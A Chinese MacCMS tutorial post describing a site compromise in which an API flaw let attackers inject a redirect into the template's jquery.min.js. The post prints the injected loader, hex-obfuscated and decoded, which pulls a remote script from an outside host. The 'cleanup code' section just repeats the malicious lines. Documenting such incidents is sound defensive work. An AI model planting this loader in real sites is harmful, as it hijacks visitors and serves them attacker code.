您现在的位置是:首页 > 苹果CMS教程苹果CMS教程
苹果cms最新漏洞被挂马跳转劫持及清除代码
2025-11-18【苹果CMS教程】人已围观
简介
网站被挂马跳转劫持跳转到H APP下载页。被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。挂马图片通过日志查看挂马过程该漏洞是利用苹果
网站被挂马跳转劫持跳转到H APP下载页。
被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。
挂马图片
通过日志查看挂马过程
该漏洞是利用苹果CMS的API执行SHELL,
挂马文件在模板的jquery.min.js
;var head=document.getElementsByTagName(‘head’) [0];var script=document.createElement(‘script’);script [‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是
解密之后是
var head = document.getElementsByTagName(‘head’) [0];
var script = document.createElement(‘script’);
script [‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码
var script = document.createElement(‘script’);
script [‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码
关闭后台采集API功能。或自定义API接口名字,
Tags:苹果CMS教程
很赞哦! ()
相关文章
随机图文
苹果CMS采集工具(苹果cms定时采集教程)
苹果CMS采集,是苹果CMS影视站必不可少的功能。现在很多站长想做一个自己的影视站点,感觉影视站点的流量很大,关键词多,做起来会非常容易,的确是这样。这篇文
火车头采集文章资讯教程(上)
教程分两个大部分,一个是发布模块的配置 再就是采集规则的配置,发布模块和采集规则是两个缺一不可的组成部分。有些小伙伴们说在采集的时候老是发布失败是
苹果CMS如何添加视频资源
如果不会采集视频可以参考这个教程:苹果cms自定义资源库采集教程有些时候,我们在采集资源的时候会发现,有的资源有数据但是没有播放源。我们又在其它的非采
苹果cms怎么提供采集接口让他人采集(苹果cms在线采集接口)
操作步骤:苹果cms管理后台:系统>>开放API配置>>①接口开关:开启②是否收费:根据自己需求设置③列表每页显示数量:建议默认20④图片域名:显示图片的完整访问路